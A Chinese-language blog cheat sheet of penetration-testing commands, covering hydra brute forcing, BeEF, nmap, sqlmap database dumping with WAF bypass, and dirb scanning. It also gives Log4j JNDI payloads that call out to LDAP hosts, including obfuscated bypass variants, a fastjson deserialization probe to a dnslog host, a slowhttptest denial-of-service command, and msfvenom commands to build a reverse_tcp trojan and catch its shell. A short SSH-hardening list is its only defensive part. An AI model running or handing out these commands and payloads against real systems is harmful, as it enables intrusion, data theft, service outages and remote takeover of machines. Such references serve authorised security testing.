渗透测试工具使用总结

1.hydra[海德拉]:

密码能否被破解,关键取决于字典是否强大,
使用:

hydra -L user -P passlist.txt ftp://192.168.0.1
暴力破解的防御

useradd shell #对于不需要登录的用户,在新建用户的时候可以加入" -s /sbin/nologin"

密码的复杂性 #字母大小写+数字+特殊字符+20位以上+1个月更换一次

修改默认的端口 #修改"vim /etc/ssh/sshd_config"文件

组织登录的用户或组 #不允许用户登录,"PermitRootLogin yes" 添加特定的登录用户 ,"AllowUsers xxx"

使用sudo #

设置允许访问的IP #"/etc/hosts.allow" 只允许从堡垒机访问

使用DenyHosts自动统计,并将其加入到"/etc/hosts.deny"

禁用密码改用公钥认证登录

保护XSHELL导出会话文件

2.XSS漏洞复现工具(BeFF):

BeFF在Kali中已经自动集成,在运行BeFF之前要先开启Kali apache服务,"service apache start",所有要访问的页面在"/var/www/html"目录下面,也可以新建测试html页面。
在使用"systemctl start beef-xss.service "来开启BeFF服务,在Kali机的桌面也要启动BeFF的监听服务,默认端口为3000端口,

3.NMAP:

nmap -sn [IP]    #主机发现
nmap -sS [端口] [IP]    #端口扫描(TCP端口扫描)
nmap -O [IP]    #系统扫描
namp -sV [IP]    #版本扫描
nmap -Pn[IP]    #跳过主机发现  
nmap -sU[IP]    #用户udp扫描

4.SQLMAP:

一般的数据库注入步骤:

1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点

2. --dbs 【检测站点包含哪些数据库

3. --current-db 【获取当前的数据库名

4. --tables -D "db_name" 【获取指定数据库中的表名 -D后接指定的数据库名称

5. --columns -T "table_name" -D "db_name" 【获取数据库表中的字段

6. --dump -C "columns_name" -T "table_name" -D "db_name" 【获取字段的数据内容

Cookie注入:

sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2  【cookie注入 后接cookie值

POST注入:

(1)目标地址http:// www.xxx.com /login.asp
(2)打开brup代理。
(3)点击表单提交
(4)burp获取拦截信息(post)
(5)右键保存文件(.txt)到指定目录下
(6)运行sqlmap并执行如下命令:
        用例:sqlmap -r okay.txt  -p  username
        -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
(7)自动获取表单:--forms自动获取表单
        例如:sqlmap -u www.xx.com/login.asp --forms
(8)指定参数搜索:--data
        例如:sqlmap -u www.xx.com/login.asp --data "username=1"

SQLMAP常用的命令:

1.    --purge      【重新扫描(--purge 删除原先对该目标扫描的记录)

2.    --tables      【获取表名

3.     --dbs         【检测站点包含哪些数据库

4.     --current-db    【获取当前的数据库名

5.     --current-user  【检测当前用户

6.    --is-dba   【判断站点的当前用户是否为数据库管理员

7.    --batch      【默认确认,不询问你是否输入

8.    --search  【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)

9.    --threads 10  【线程,sqlmap线程最高设置为10

10.  --level 3        【sqlmap默认测试所有的GET和POST参数,当--level的值大于等于2的时候也会测试HTTP Cookie头
                                的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
11.  --risk 3           【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全

12.     -v   【详细的等级(0-6)
          0:只显示Python的回溯,错误和关键消息。
          1:显示信息和警告消息。
          2:显示调试消息。
          3:有效载荷注入。
          4:显示HTTP请求。
          5:显示HTTP响应头。
          6:显示HTTP响应页面的内容

13.    --privileges  【查看权限

14.   --tamper xx.py,cc.py   【防火墙绕过,后接tamper库中的py文件

15.  --method "POST" --data "page=1&id=2"   【POST方式提交数据

16.  --threads number  【采用多线程 后接线程数

17.  --referer  ""  【使用referer欺骗

18.  --user-agent ""     【自定义user-agent

19.  --proxy “目标地址″   【使用代理注入

Kali系统集成的SQLMAP工具目录:

sqlmap常用路径:
1. 添加表字段的目录在sqlmap/txt/common-tables.txt
2. 存放扫描记录的目录在sqlmap/output

5.Log4j检测及绕过:

检测:
${jndi:ldap://4jvfqe.ceye.io/exp}

绕过:

原本POC:
${jndi:ldap://malicious-ldap-server.com/a}
绕过的POC:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}
可行的POC:
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}

6.接口反序列化测试:

{"@type":"java.net.InetSocketAddress"{
"address":,
"val":"cyl31t.dnslog.cn"}}

 7.Kali自集成的web目录扫描工具:

dirb

使用方法:

dirb [URL]

它的字典放在:

/usr/share/dirb/wordlist/common.txt

如果指定文件类型扫描,则使用如下命令:

dirb [URL] -X .txt,.php,.zip

 8.slowhttptest使用语句

slowhttptest -c 8000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.xxx.com -p 3

 9.MSF生成远控木马命令

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[攻击机IP] lport=[攻击机监听端口] -f exe -o demo.exe

 下一步开启msf的监听,等待木马上线

use exploit/mutil/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost [攻击机IP]
set lport [攻击机端口]
run

 

posted @ 2023-03-10 10:11  田家少闲月-  阅读(187)  评论(0编辑  收藏  举报